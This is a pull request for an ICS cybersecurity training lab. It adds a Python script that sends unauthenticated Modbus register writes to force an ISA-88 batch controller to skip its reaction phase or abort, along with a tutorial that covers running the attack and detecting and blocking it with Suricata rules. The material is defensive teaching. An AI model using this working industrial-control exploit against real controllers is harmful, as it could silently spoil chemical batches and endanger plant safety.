### PR TITLE
feat: ISA-88 batch recipe-tampering attack tutorial

### DIFF
--- a/containers/attack-base/entrypoint.sh
+++ b/containers/attack-base/entrypoint.sh
@@ -1081,6 +1081,199 @@ PYEOF
 
 chmod +x /root/Desktop/Attack_Scripts/sis_attack.py
 
+# ── batch_attack.py ────────────────────────────────────────────────────────────
+# ISA-88 Batch Tutorial: unauthorized Modbus write directly to a batch-controller's
+# current_phase/batch_state holding registers. buildBatchProgram()
+# (packages/orchestrator/src/plc-program-gen.ts) generates these as located %QW
+# outputs with no self-overriding logic — nothing in the ST rejects an externally
+# written phase value, so an attacker who can reach Modbus TCP can force the
+# recipe to skip straight to DISCHARGE regardless of the real REACT hold timer
+# or the reactor's real temperature. Unlike the SIS/DCS attacks elsewhere in this
+# project (which stop or disable a process — a visible denial of service), this
+# is a data-integrity/quality attack: the batch completes "successfully" from the
+# PLC's own state machine's point of view, with no alarm, while the chemical
+# reaction never actually finished. Uses FC16 (Write Multiple Registers) rather
+# than FC06 specifically because the pre-loaded ics-rules.rules already has a
+# generic FC16 baseline (SID 9000001/9000030) — the same "baseline rule already
+# fires, then the student authors a host-scoped rule" structure sis_attack.py's
+# Lab 04 uses with FC05/SID 9000002.
+cat > /root/Desktop/Attack_Scripts/batch_attack.py << 'PYEOF'
+#!/usr/bin/env python3
+"""
+batch_attack.py — Unauthorized Modbus register write against an ISA-88 batch
+controller, forcing a premature phase transition. ISA-88 Batch Tutorial.
+
+Writes Modbus Function Code 16 (Write Multiple Registers) to the batch
+controller's current_phase register (holding register 1 by default) — the
+same located %QW1 output buildBatchProgram()'s phase-sequencer ST reads and
+writes every scan, but from an unauthorized source. Modbus has no built-in
+authentication: any host that can reach TCP port 502 can issue this command.
+
+Default attack: write current_phase=5 (DISCHARGE) while the batch is mid-REACT.
+The reactor's discharge valve opens and the vessel actually drains via real
+physics — this is a genuine physical consequence, not a cosmetic state flip —
+but the reaction hold timer was skipped entirely. No alarm fires: the batch
+still reaches COMPLETE, exactly as if it had finished normally.
+
+Bonus/challenge variant: --register 0 --value 3 writes batch_state=ABORTED
+directly, forcing an immediate stop from any phase (a denial-of-service
+variant, contrasted with the default quality-integrity attack above).
+
+Usage:
+    python3 batch_attack.py <batch-controller-ip> [--port 502] [--register 1] [--value 5]
+
+Examples:
+    python3 batch_attack.py 10.200.10.15                    # force-skip to DISCHARGE
+    python3 batch_attack.py 10.200.10.15 --register 0 --value 3   # force ABORT (bonus)
+"""
+
+import argparse
+import os
+import socket
+import struct
+import sys
+
+
+def build_write_multiple_registers(transaction_id, unit_id, start_address, values):
+    """
+    Builds a Modbus/TCP Write Multiple Registers (FC 0x10) request.
+
+    MBAP header: TransactionID(2) + ProtocolID(2)=0 + Length(2) + UnitID(1)
+    PDU: FunctionCode(1)=0x10 + StartAddress(2) + Quantity(2) + ByteCount(1)
+         + Values(2 bytes each)
+    """
+    quantity = len(values)
+    byte_count = quantity * 2
+    pdu = struct.pack(">BHHB", 0x10, start_address, quantity, byte_count)
+    for v in values:
+        pdu += struct.pack(">H", v)
+    length = 1 + len(pdu)  # unit id + PDU
+    mbap = struct.pack(">HHHB", transaction_id, 0x0000, length, unit_id)
+    return mbap + pdu
+
+
+PHASE_NAMES = {0: "NONE", 1: "CHARGE", 2: "HEAT", 3: "REACT", 4: "COOL", 5: "DISCHARGE"}
+STATE_NAMES = {0: "IDLE", 1: "RUNNING", 2: "HELD", 3: "ABORTED", 4: "COMPLETE"}
+
+
+def run_attack(host, port, unit_id, register, value, timeout):
+    is_phase_write = register == 1
+    label = PHASE_NAMES.get(value, str(value)) if is_phase_write else STATE_NAMES.get(value, str(value))
+    reg_name = "current_phase (HR1)" if is_phase_write else "batch_state (HR0)" if register == 0 else f"HR{register}"
+
+    print(f"[batch-attack] Target:  {host}:{port}  (Modbus TCP, unit id {unit_id})")
+    print(f"[batch-attack] Command: Write Multiple Registers (FC 0x10) -> {reg_name} -> {value} ({label})")
+    print()
+    print("[batch-attack] NOTE: Modbus requires no credentials — any host that can reach")
+    print("[batch-attack] TCP port 502 on this batch controller can issue this command.")
+    if is_phase_write:
+        print("[batch-attack] Forcing current_phase directly skips the recipe's REACT hold")
+        print("[batch-attack] timer entirely. Nothing in the generated ST rejects an unexpected")
+        print("[batch-attack] phase value — the batch will discharge and reach COMPLETE with")
+        print("[batch-attack] no alarm, even though the reaction never actually finished.")
+    print()
+
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.settimeout(timeout)
+    try:
+        sock.connect((host, port))
+    except ConnectionRefusedError:
+        print(f"[batch-attack] ERROR: Connection refused — {host}:{port} is not reachable.")
+        print("[batch-attack] If an IPS reject rule or firewall block is active, this is expected!")
+        sys.exit(2)
+    except socket.timeout:
+        print(f"[batch-attack] ERROR: Connection timed out after {timeout}s.")
+        sys.exit(1)
+    except OSError as exc:
+        print(f"[batch-attack] ERROR: {exc}")
+        sys.exit(1)
+
+    print(f"[batch-attack] TCP connection established to {host}:{port}")
+
+    frame = build_write_multiple_registers(transaction_id=1, unit_id=unit_id,
+                                            start_address=register, values=[value])
+    print(f"[batch-attack] Sending Write Multiple Registers frame ({len(frame)} bytes):")
+    print(f"[batch-attack]   Function code:   0x10  (Write Multiple Registers)")
+    print(f"[batch-attack]   Start register:  {register}")
+    print(f"[batch-attack]   Value:           {value} ({label})")
+    print(f"[batch-attack]   Full frame hex:  {frame.hex(' ')}")
+    print()
+    sock.sendall(frame)
+    print("[batch-attack] Write request transmitted — waiting for response ...")
+
+    try:
+        response = sock.recv(12)
+        if response:
+            print(f"[batch-attack] Response received: {response.hex(' ')}")
+        else:
+            print("[batch-attack] Server closed connection without responding.")
+    except socket.timeout:
+        print(f"[batch-attack] No response within {timeout}s.")
+        print("[batch-attack] The packet was still delivered — Suricata should have seen it.")
+    except ConnectionResetError:
+        print("[batch-attack] Connection reset by peer while waiting for a response.")
+        print("[batch-attack] If an IPS reject rule is active, this is the expected result —")
+        print("[batch-attack] the write was likely blocked before the controller could act on it.")
+        sock.close()
+        sys.exit(2)
+
+    sock.close()
+
+    print()
+    print("[batch-attack] ═══════════════════════════════════════════════════════════")
+    print("[batch-attack]  ATTACK COMPLETE")
+    print(f"[batch-attack]  {reg_name} on {host} -> {value} ({label})")
+    print("[batch-attack]  Now check: OpenPLC Monitoring -> current_phase/batch_state")
+    print("[batch-attack]             OTForge Monitor -> Suricata tab for SID 9000001/9000030")
+    print("[batch-attack] ═══════════════════════════════════════════════════════════")
+
+
+def main():
+    # NOTE: intentionally NOT 10.200.10.10/.11 — those are the plc_init
+    # background poller's PLC_IP default (this script's docstring explains
+    # why) and the RTU_IP/SIS_IP defaults respectively. A batch-controller
+    # placed at either address would get its start_cmd/hold_cmd coils and
+    # batch_state register silently overwritten by plc_init.py's Lab01-
+    # specific baseline seed on container boot before a student ever
+    # touches anything. Found live-verifying this tutorial.
+    default_ip = os.getenv("BATCH_IP", "10.200.10.15")
+    parser = argparse.ArgumentParser(
+        description="Modbus batch-controller phase/state register write attack — ISA-88 Batch Tutorial"
+    )
+    parser.add_argument(
+        "target", nargs="?", default=default_ip,
+        help=f"IP of target batch controller (default: {default_ip})"
+    )
+    parser.add_argument("--port", type=int, default=502, help="TCP port (default 502)")
+    parser.add_argument("--unit", type=int, default=1, help="Modbus unit id (default 1)")
+    parser.add_argument(
+        "--register", type=int, default=1,
+        help="Holding register to write — 1 = current_phase (default), 0 = batch_state"
+    )
+    parser.add_argument(
+        "--value", type=int, default=5,
+        help="Value to write — default 5 (force current_phase=DISCHARGE). "
+             "Use --register 0 --value 3 to force batch_state=ABORTED instead."
+    )
+    parser.add_argument("--timeout", type=float, default=5.0, help="Socket timeout in seconds (default 5)")
+    args = parser.parse_args()
+
+    run_attack(
+        host=args.target,
+        port=args.port,
+        unit_id=args.unit,
+        register=args.register,
+        value=args.value,
+        timeout=args.timeout,
+    )
+
+
+if __name__ == "__main__":
+    main()
+PYEOF
+
+chmod +x /root/Desktop/Attack_Scripts/batch_attack.py
+
 echo "[otforge-attack] Attack_Scripts created:"
 echo "[otforge-attack]   /root/Desktop/Attack_Scripts/read_coils.py      — read coil + register state (one-shot)"
 echo "[otforge-attack]   /root/Desktop/Attack_Scripts/write_coil.py      — coil write attack (--restore to undo)"
@@ -1089,6 +1282,7 @@ echo "[otforge-attack]   /root/Desktop/Attack_Scripts/monitor_level.py   — liv
 echo "[otforge-attack]   /root/Desktop/Attack_Scripts/dnp3_attack.py     — DNP3 Direct Operate attack (Lab 03)"
 echo "[otforge-attack]   /root/Desktop/Attack_Scripts/iec61850_attack.py — IEC 61850 MMS breaker control attack (IEC 61850 Tutorial)"
 echo "[otforge-attack]   /root/Desktop/Attack_Scripts/sis_attack.py       — Modbus SIS trip-relay coil write attack (Lab 04, TRITON/TRISIS)"
+echo "[otforge-attack]   /root/Desktop/Attack_Scripts/batch_attack.py     — Modbus batch-controller phase/state register write attack (ISA-88 Batch Tutorial)"
 
 # ── PLC Modbus baseline initialization ────────────────────────────────────────
 # Runs in the background so VNC/noVNC startup is not delayed.

--- a/scenarios/ISA88_Batch_Tutorial.otflab
+++ b/scenarios/ISA88_Batch_Tutorial.otflab
@@ -1,0 +1,258 @@
+{
+  "meta": {
+    "formatVersion": "1.0",
+    "name": "ISA-88 Batch Tutorial — Recipe Tampering Attack",
+    "description": "A guided tutorial on ISA-88 batch process control and its most distinctive attack surface: a directly writable recipe-phase register. Students run a real 5-phase batch (Charge/Heat/React/Cool/Discharge) to completion, then force-skip the REACT hold by writing an unauthorized Modbus register value — discharging an under-reacted batch with no alarm. Detection is covered with the platform's Suricata/Zeek/Grafana stack, including authoring a host-scoped custom rule. Developed for ICS/SCADA cybersecurity courses at UTSA.",
+    "sector": "chemical-batch",
+    "author": "Ian Burres — UTSA",
+    "createdAt": "2026-07-23T00:00:00.000Z",
+    "updatedAt": "2026-07-23T00:00:00.000Z",
+    "appVersion": "0.13.0",
+    "locked": false,
+    "brief": "## Mission: Recipe Integrity at Meridian Specialty Chemicals\n\nMeridian Specialty Chemicals runs a batch reactor through a fixed 5-phase ISA-88 recipe: **Charge → Heat → React → Cool → Discharge**. A contractor's laptop, still connected to the plant network from a service visit last week, has been repurposed by an attacker with direct access to the OT network — no phishing or pivoting required for this one; that ground is already covered in ICS_Lab_01 and ICS_Lab_04. Your job is to:\n\n1. Run a normal batch to completion and understand the recipe.\n2. Discover that the batch controller's phase and state registers are just ordinary, unauthenticated Modbus holding registers.\n3. Force the recipe to skip its REACT hold — the step where the actual chemical reaction happens — so the batch discharges early with **no alarm, no fault, no visible sign anything went wrong**.\n4. Detect the attack in Suricata/Zeek/Grafana, then author your own host-scoped detection rule and upgrade it to a block.\n\n**Rules of Engagement:** This is an isolated Docker lab environment. All traffic stays within your local machine.",
+    "requirements": {
+      "estimatedRamMb": 2560,
+      "estimatedCpuCores": 3,
+      "containerCount": 11
+    },
+    "tutorialSteps": [
+      {
+        "id": "step-00-welcome",
+        "title": "Welcome — ISA-88 Batch Recipe Tampering",
+        "body": "## Learning Objectives\n\nBy the end of this tutorial you will be able to:\n\n- Explain the ISA-88 batch model: a fixed unit procedure of **CHARGE → HEAT → REACT → COOL → DISCHARGE** phases, tracked by a real state machine (**IDLE / RUNNING / HELD / ABORTED / COMPLETE**)\n- Operate a real batch controller through OpenPLC's Monitoring tab, the same way a plant operator would\n- Identify the batch controller's **phase and state holding registers** as an unauthenticated write target — no different from any other Modbus register in this platform\n- Execute a **recipe-tampering attack**: force-skip the REACT hold so the batch discharges before the reaction actually completes\n- Explain why this is a **data-integrity/quality attack**, not a denial of service — the batch reports success with no alarm, even though the chemistry never finished\n- Detect the attack using Suricata, Zeek, and Grafana, then author and test your own host-scoped Suricata rule\n\n---\n\n## Why You Already Have Access\n\nThis tutorial picks up **after** initial access. A contractor's laptop was left plugged into the plant network after a service visit, and an attacker has repurposed it. The reconnaissance-to-pivot techniques that would normally get you here — OSINT, DNS enumeration, network scanning, a dual-homed device pivot — are covered in depth in **ICS_Lab_01** and **ICS_Lab_04**. This tutorial does not repeat them; it starts from direct OT network access so it can focus entirely on what happens once an attacker reaches the batch controller itself.\n\n**Click Run Simulation (blue play button) to start all containers before clicking Next.**",
+        "successCheck": "Review the objectives above. Click Run Simulation in the toolbar and wait for the status indicator to show all containers running."
+      },
+      {
+        "id": "step-01-explore",
+        "title": "Step 1 — Meet the Batch Reactor",
+        "body": "## The Equipment\n\n- **Batch Controller** (`batch-1`) — an OpenPLC-based controller running a real ISA-88 phase-sequencer program. It reads the reactor's live level and temperature, drives the charge valve/heater/agitator/cooling jacket/discharge valve, and tracks two state variables: `batch_state` (the overall lifecycle: IDLE/RUNNING/HELD/ABORTED/COMPLETE) and `current_phase` (which of the 5 recipe phases is active while RUNNING).\n- **Reactor Vessel** (`reactor-1`) — the physical batch-reactor process unit. Its level and temperature genuinely respond to the controller's valve/heater/cooling commands in real time — this is real physics, not a scripted animation.\n\n## Read the Recipe\n\n1. Switch to the **OT Process** layer tab and click the **Batch Controller** node.\n2. In the **Properties Panel**, find the **Batch Recipe (ISA-88)** section. Note the configured setpoints — you'll compare live values against these as the batch runs.\n3. Click **OpenPLC IDE ↗** to open the controller's real IEC 61131-3 runtime at `http://localhost:18080` (login `openplc` / `openplc`).\n4. In the IDE, click **Monitoring** in the left nav. This is the live variable table you'll use for the rest of this tutorial — it refreshes automatically and lets you both read and write located variables directly, exactly like an operator would at an HMI.\n\nYou should see `batch_state` and `current_phase` both reading **0** (IDLE / NONE) — the batch hasn't started yet.",
+        "successCheck": "You can locate the Batch Controller and Reactor Vessel on the OT Process layer, you've read the recipe setpoints in the Properties Panel, and the OpenPLC Monitoring tab shows batch_state=0 and current_phase=0."
+      },
+      {
+        "id": "step-02-run-batch",
+        "title": "Step 2 — Run a Normal Batch",
+        "body": "## Starting the Recipe\n\nIn OpenPLC Monitoring, find `start_cmd` (a BOOL located at `%QX0.0`). Click its **Write** column and set it to **TRUE** for one scan, then let it return to FALSE — this is a momentary start pulse, the same way a real operator's \"Start Batch\" HMI button works.\n\n**Watch what happens over the next couple of minutes:**\n\n- `batch_state` jumps to **1 (RUNNING)**\n- `current_phase` advances through the recipe on its own: **1 (CHARGE)** while the vessel fills to its charge target, then **2 (HEAT)** while the heater brings the vessel up to its setpoint temperature, then **3 (REACT)** once temperature is reached\n- Watch `level_pv` and `temp_pv` climb in Monitoring as this happens — this is the real reactor physics responding to the controller's charge-valve and heater commands\n\n**Stop here once `current_phase` reads 3 (REACT).** This is the phase where the actual chemical reaction happens — the recipe holds this phase for a fixed duration before allowing the batch to proceed to COOL. You have the full length of that hold to complete the next two steps, so don't rush, but don't leave the tab either.",
+        "successCheck": "batch_state reads 1 (RUNNING) and current_phase reads 3 (REACT). temp_pv is at or near the configured heat setpoint. The batch is now holding in REACT — proceed to the next step while it holds."
+      },
+      {
+        "id": "step-03-recon",
+        "title": "Step 3 — Reconnaissance: Document the Baseline",
+        "body": "## Think Like an Attacker\n\nBefore changing anything, a real attacker documents the current state — partly to confirm the target is in a state worth attacking, partly to understand what \"normal\" looks like well enough to fake it.\n\nIn OpenPLC Monitoring, note the current values of:\n\n- `batch_state` — should read **1 (RUNNING)**\n- `current_phase` — should read **3 (REACT)**\n- `temp_pv` — the live reactor temperature, at or near the heat setpoint\n- `level_pv` — the live reactor fill level\n\nThis is exactly the information you'd need to know *when* to strike: attacking during CHARGE or HEAT wouldn't demonstrate anything interesting (the recipe would just re-enter those phases correctly). Attacking during REACT — and forcing an early exit from it — is what actually discharges an under-reacted batch.",
+        "successCheck": "You've noted batch_state=1, current_phase=3, and the current temp_pv/level_pv values. You understand why REACT specifically is the phase worth attacking."
+      },
+      {
+        "id": "step-04-attack",
+        "title": "Step 4 — Execute the Attack: Force-Skip REACT",
+        "body": "## The Vulnerability\n\n`current_phase` is a located variable (`%QW1`, Modbus holding register 1) that the controller's own ST program reads AND writes every scan — but nothing in that program checks where a new value came from, or rejects one that doesn't match the program's own internal logic. It's exactly as unauthenticated as every other Modbus register in this platform. Any host that can reach TCP port 502 can write it directly.\n\n## The Attack\n\nOpen the **⚔ Kali Terminal** and run:",
+        "command": "python3 /root/Desktop/Attack_Scripts/batch_attack.py",
+        "successCheck": "The script prints 'ATTACK COMPLETE' confirming a Write Multiple Registers (FC 0x10) frame was sent to current_phase (HR1) with value 5 (DISCHARGE). No error, no authentication prompt — the controller accepted the write unconditionally, exactly like every other unauthenticated Modbus write in this platform."
+      },
+      {
+        "id": "step-05-consequence",
+        "title": "Step 5 — Observe the Consequence",
+        "body": "## What Just Happened\n\nSwitch back to OpenPLC Monitoring. You should see:\n\n- `current_phase` jumped straight to **5 (DISCHARGE)** — skipping the rest of the REACT hold entirely\n- The discharge valve coil (`discharge_valve_out`) energizes, and `level_pv` begins dropping as the reactor genuinely drains — this is real physics responding to the forced phase value, not a cosmetic flag flip\n- Once the level drops to the recipe's discharge target, `batch_state` advances to **4 (COMPLETE)** and `current_phase` returns to **0 (NONE)**\n\n## Why This Matters\n\nCompare this to the SIS and DCS attacks elsewhere in this platform, which stop or disable a process outright — a loud, visible denial of service. This attack is quieter and arguably more dangerous: **the batch reports COMPLETE.** No alarm fired. No fault was logged. From the controller's own point of view, everything went perfectly. The only thing wrong is invisible to the control system entirely: the chemical reaction inside that vessel never ran for its required hold time. In a real specialty-chemical process this is the mechanism by which an attacker could silently degrade product quality or safety margins — a subtler and, for an adversary, considerably more useful outcome than simply shutting the plant down.",
+        "successCheck": "current_phase reached 5 (DISCHARGE), level_pv dropped as the reactor drained, and batch_state reached 4 (COMPLETE) with current_phase back at 0. No alarm or fault indication appeared anywhere in OpenPLC Monitoring."
+      },
+      {
+        "id": "step-06-detect",
+        "title": "Step 6 — Detect the Attack",
+        "body": "## Opening the Monitor Panel\n\n1. Click the **Monitor** button in the OTForge toolbar (visible while the simulation is running).\n2. In **Live Logs**, filter by **Suricata**. You should already see an alert fired automatically from the single write you already sent — no custom rule needed yet:\n   - **SID 9000001** — \"ICS-SIM Modbus TCP Write Multiple Registers\" — a signature rule, fires on every matching packet individually. Your one attack run already triggered it.\n\n## A Second, Rate-Based Rule\n\nThere's a second pre-loaded rule worth knowing about: **SID 9000030** — \"ICS-SIM Unexpected Modbus write to OT device.\" Unlike SID 9000001, this one is a **threshold rule**: it only fires after 5 matching writes from the same source within a 10-second window. One attack run won't trigger it — that's by design, not a bug. Rate-based rules like this exist to catch scripted/repeated attack patterns without generating an alert storm on every single legitimate-looking write. See it fire yourself:\n```\nfor i in 1 2 3 4 5; do python3 /root/Desktop/Attack_Scripts/batch_attack.py > /dev/null; done\n```\n\n## Grafana\n\n3. Click **Open Grafana ↗**. In **Explore**, run:\n```\n{job=\"suricata\", event_type=\"alert\"} |= \"{{batch-1.ip}}\"\n```\nAfter the loop above you should see both SID 9000001 (multiple times) and SID 9000030 (once it crosses the threshold), scoped to the batch controller's address. Also check the **Zeek** logs:\n```\n{job=\"zeek\", filename=~\".*modbus.log\"} |= \"{{batch-1.ip}}\"\n```\nThis shows the raw connection record — source `{{attack-1.ip}}`, destination `{{batch-1.ip}}:502` — the same evidence a SOC analyst would use to begin an investigation.",
+        "command": "for i in 1 2 3 4 5; do python3 /root/Desktop/Attack_Scripts/batch_attack.py > /dev/null; done",
+        "successCheck": "You can see SID 9000001 in the Monitor's Live Logs after your first attack run, and SID 9000030 appears after the 5x loop. Both LogQL queries return matching entries in Grafana Explore scoped to the batch controller's IP."
+      },
+      {
+        "id": "step-07-custom-rule",
+        "title": "Step 7 — Write a Custom Detection Rule, Then Block It",
+        "body": "## Why Scope by Destination IP\n\nThe pre-loaded rules you just saw match *any* FC16 write to *any* device — useful as a baseline, but not specific to this batch controller. A rule scoped to the controller's own IP catches an attack on this device regardless of what host it comes from — the contractor's laptop, a different compromised workstation, anything.\n\n## Write the Alert Rule\n\n1. Click the **Suricata IDS/IPS Sensor** node (Plant DMZ zone).\n2. In the Properties Panel, scroll to **Custom Suricata Rules**.\n3. Type:\n```\nalert tcp any any -> {{batch-1.ip}} 502 (msg:\"BATCH-ALERT Unauthorized write to batch controller\"; flow:to_server,established; content:\"|10|\"; offset:7; depth:1; classtype:attempted-admin; sid:9100001; rev:1;)\n```\n4. Click **Save**, then **Stop Simulation** and **Run Simulation** again to reload the rule set. **Give it 10-15 seconds after the status shows running** before testing — Suricata reloads its full signature set (including the emerging-scada/emerging-modbus bundles) in the background, and custom rules only become active once that reload completes.\n5. Re-run the attack:\n```\npython3 /root/Desktop/Attack_Scripts/batch_attack.py\n```\n6. In Grafana Explore, re-run your query from Step 6 — you should now see SID 9100001 alongside SID 9000001.\n\n## Upgrade to a Block\n\n7. Back in **Custom Suricata Rules**, add a second line below your alert rule:\n```\nreject tcp any any -> {{batch-1.ip}} 502 (msg:\"BATCH-BLOCK Unauthorized write to batch controller\"; flow:to_server,established; content:\"|10|\"; offset:7; depth:1; classtype:attempted-admin; sid:9100002; rev:1;)\n```\n8. **Save**, **Stop Simulation**, **Run Simulation** again — and again, give it 10-15 seconds before testing.\n9. Re-run the attack one more time. This time you should NOT see a normal \"ATTACK COMPLETE\" with a response received — expect \"Connection reset by peer\" instead, since Suricata's `reject` action now tears the connection down before the write can land.",
+        "command": "python3 /root/Desktop/Attack_Scripts/batch_attack.py",
+        "successCheck": "Your alert rule (SID 9100001) fired on the first re-test. After adding the reject rule (SID 9100002) and restarting, re-running the attack script produced a connection error rather than a clean ATTACK COMPLETE — confirming the write was blocked, not just detected."
+      },
+      {
+        "id": "step-08-debrief",
+        "title": "Step 8 — Debrief and Lab Report",
+        "body": "## Vulnerabilities Exploited\n\n- **Unauthenticated, writable recipe-state registers** — `current_phase` and `batch_state` are ordinary Modbus holding registers with no access control and no validation against the controller's own program logic.\n  - *Mitigation:* a real elapsed-time watchdog inside the ST program itself (tracking actual wall-clock time in REACT, independent of the phase register's own value) would at minimum detect the discrepancy; IEC 62443 zone/conduit segmentation would prevent the write from arriving at all.\n- **Missing network segmentation** — the attack machine reached the batch controller directly because the firewall's policy allows it (see the **INTENTIONALLY INSECURE** rule on the Plant Firewall node).\n  - *Mitigation:* select the **Plant Firewall** node, find that rule, and change its action from `allow` to `deny`. Stop and restart the simulation, then re-run the attack script — it should now fail to connect at all.\n\n## Detection Recap\n\nTwo pre-loaded rules fired automatically on the very first attack (SID 9000001, SID 9000030) with zero authoring effort. Your host-scoped rule (SID 9100001) added precision; upgrading it to `reject` (SID 9100002) converted detection into prevention — but only for this one device. The underlying architectural gap (a contractor's laptop with standing OT network access) is still unresolved; that's a network-design problem, not a Suricata rule.\n\n## Challenge Exercise\n\nTry the bonus attack variant — a denial-of-service instead of the quality-integrity attack you just performed:\n```\npython3 /root/Desktop/Attack_Scripts/batch_attack.py --register 0 --value 3\n```\nThis writes `batch_state=3` (ABORTED) directly, forcing an immediate stop from any phase. Compare how this shows up in Monitoring and Grafana versus the REACT-skip attack — which one would a human operator notice faster, and which one actually reaches your custom rule (hint: check the function code both attacks use)?\n\n## Lab Report Requirements\n\nSubmit a **PDF or Word document** containing:\n\n1. **Attack Chain Summary** — describe the recipe-tampering attack in your own words: what register was written, what value, and why REACT specifically was the target.\n2. **Vulnerability Analysis** — for the unauthenticated register write and the missing segmentation, explain what the vulnerability is and what mitigation would prevent it.\n3. **Detection Analysis** — explain what SID 9000001/9000030/9100001/9100002 each indicate, and why destination-IP scoping makes your custom rule more precise than the baseline rules.\n4. **Reflection** — why is a quality/data-integrity attack like this one arguably more dangerous in a real chemical plant than a straightforward denial-of-service, even though it's less immediately visible?\n\nInclude one labeled screenshot per step in an Appendices section at the end (no screenshots in the main written section).",
+        "successCheck": "You can describe the full attack chain, name the two mitigations, and have completed (or at least attempted) the challenge exercise. Your lab report contains all four written sections plus a labeled Appendices section."
+      }
+    ]
+  },
+  "visual": {
+    "nodes": [
+      {
+        "id": "batch-1",
+        "type": "batch-controller",
+        "position": { "x": 120, "y": 200 },
+        "data": { "label": "Batch Controller", "zone": "ot" }
+      },
+      {
+        "id": "reactor-1",
+        "type": "process-unit",
+        "position": { "x": 360, "y": 200 },
+        "data": { "label": "Reactor Vessel", "zone": "ot" }
+      },
+      {
+        "id": "switch-ot",
+        "type": "switch",
+        "position": { "x": 120, "y": 360 },
+        "data": { "label": "OT Switch", "zone": "ot" }
+      },
+      {
+        "id": "firewall-1",
+        "type": "firewall",
+        "position": { "x": 320, "y": 360 },
+        "data": { "label": "Plant Firewall", "zone": "plant-dmz" }
+      },
+      {
+        "id": "ids-1",
+        "type": "ids-ips",
+        "position": { "x": 500, "y": 360 },
+        "data": { "nodeId": "ids-1", "label": "Suricata IDS/IPS\nSensor", "category": "ids-ips", "zone": "plant-dmz" }
+      },
+      {
+        "id": "attack-1",
+        "type": "attack-machine",
+        "position": { "x": 500, "y": 200 },
+        "data": { "label": "Kali Linux", "zone": "attacker" }
+      }
+    ],
+    "edges": [
+      {
+        "id": "e-batch-reactor",
+        "source": "batch-1",
+        "target": "reactor-1",
+        "data": { "protocol": "modbus-tcp", "label": "Modbus TCP :502", "fluidType": "electric" }
+      },
+      {
+        "id": "e-batch-switch",
+        "source": "batch-1",
+        "target": "switch-ot",
+        "data": { "protocol": "none", "label": "" }
+      },
+      {
+        "id": "e-switch-firewall",
+        "source": "switch-ot",
+        "target": "firewall-1",
+        "data": { "protocol": "none", "label": "" }
+      },
+      {
+        "id": "e-firewall-ids",
+        "source": "firewall-1",
+        "target": "ids-1",
+        "data": { "protocol": "none", "label": "" }
+      },
+      {
+        "id": "e-attack-ids",
+        "source": "attack-1",
+        "target": "ids-1",
+        "data": { "protocol": "none", "label": "Monitored traffic" }
+      },
+      {
+        "id": "e-attack-batch",
+        "source": "attack-1",
+        "target": "batch-1",
+        "data": { "protocol": "modbus-tcp", "label": "Direct OT access (extraNetworks)" }
+      }
+    ],
+    "viewport": { "x": 0, "y": 0, "zoom": 0.9 }
+  },
+  "network": {
+    "segments": [
+      {
+        "zone": "ot",
+        "subnet": "10.200.10.0/24",
+        "gateway": "10.200.10.1",
+        "dockerNetwork": "ics-sim-ot-net"
+      },
+      {
+        "zone": "plant-dmz",
+        "subnet": "10.200.30.0/24",
+        "gateway": "10.200.30.1",
+        "dockerNetwork": "ics-sim-plant-dmz-net"
+      },
+      {
+        "zone": "attacker",
+        "subnet": "10.200.60.0/24",
+        "gateway": "10.200.60.1",
+        "dockerNetwork": "ics-sim-attacker-net"
+      }
+    ],
+    "routes": []
+  },
+  "devices": {
+    "devices": {
+      "batch-1": {
+        "nodeId": "batch-1",
+        "category": "batch-controller",
+        "ipAddress": "10.200.10.15",
+        "protocols": ["modbus-tcp"],
+        "batch": {
+          "recipeName": "Specialty Polymer Batch — Recipe REV C",
+          "chargeTargetPct": 60,
+          "heatSetpointC": 55,
+          "reactHoldSec": 45,
+          "coolSetpointC": 30,
+          "dischargeTargetPct": 5
+        }
+      },
+      "reactor-1": {
+        "nodeId": "reactor-1",
+        "category": "process-unit",
+        "ipAddress": "10.200.10.20",
+        "protocols": ["modbus-tcp"],
+        "processUnit": {
+          "processType": "batch-reactor",
+          "tankVolumeL": 500,
+          "tankAreaM2": 1,
+          "valveFlowMaxLpm": 600,
+          "heaterRateCPerSec": 1.5,
+          "coolingRateCPerSec": 2.0,
+          "initialLevelPct": 0
+        }
+      },
+      "switch-ot": {
+        "nodeId": "switch-ot",
+        "category": "switch",
+        "ipAddress": "10.200.10.30",
+        "protocols": ["none"]
+      },
+      "firewall-1": {
+        "nodeId": "firewall-1",
+        "category": "firewall",
+        "ipAddress": "10.200.30.10",
+        "protocols": ["none"]
+      },
+      "attack-1": {
+        "nodeId": "attack-1",
+        "category": "attack-machine",
+        "ipAddress": "10.200.60.10",
+        "protocols": ["none"],
+        "extraNetworks": ["ot"]
+      }
+    }
+  },
+  "security": {
+    "defaultFirewallPolicy": "deny",
+    "firewallRules": [
+      {
+        "id": "rule-allow-attacker-ot-modbus",
+        "sourceZone": "attacker",
+        "destinationZone": "ot",
+        "protocol": "tcp",
+        "destinationPort": 502,
+        "action": "allow",
+        "comment": "INTENTIONALLY INSECURE: a contractor's laptop, still connected from a service visit, gives the attack machine direct Modbus access to the OT network. Students flip this to deny in the closing challenge exercise."
+      }
+    ],
+    "ids": {
+      "enabledRulesets": ["emerging-scada", "emerging-modbus"],
+      "disabledRuleIds": [],
+      "zeekScripts": ["modbus.zeek"]
+    },
+    "logging": {
+      "retentionDays": 7,
+      "influxdbEnabled": true,
+      "lokiEnabled": true
+    }
+  },
+  "registry": [],
+  "packLayers": []
+}


### PR DESCRIPTION
## Summary
Second item in the post-ISA-88 roadmap sequence (PMU done → **batch tutorial** → IIoT/MQTT → IT/Enterprise). Builds on the ISA-88 batch engine (PR #63), whose unauthenticated, writable `current_phase`/`batch_state` register was deliberately built to enable exactly this tutorial.

- **New `batch_attack.py`** (`containers/attack-base/entrypoint.sh`) — FC16 (Write Multiple Registers) attack against `current_phase`, modeled on the existing `sis_attack.py` pattern. Default forces `current_phase=5` (DISCHARGE) mid-REACT — a data-integrity/quality attack, not a DoS: the reactor genuinely drains via real physics and the batch reaches COMPLETE with no alarm, even though the reaction never finished. A `--register 0 --value 3` (force ABORT) variant is available as a bonus/challenge exercise.
- **New scenario `scenarios/ISA88_Batch_Tutorial.otflab`** — 9 steps, direct-OT-access framing (no new pivot chain, reuses the `extraNetworks` dual-homed pattern already proven in ICS_Lab_01/04): normal batch lifecycle → attack → physical consequence → Suricata/Zeek/Grafana detection → authoring a custom host-scoped alert/reject rule pair → debrief.

## Real issues found and fixed during live verification
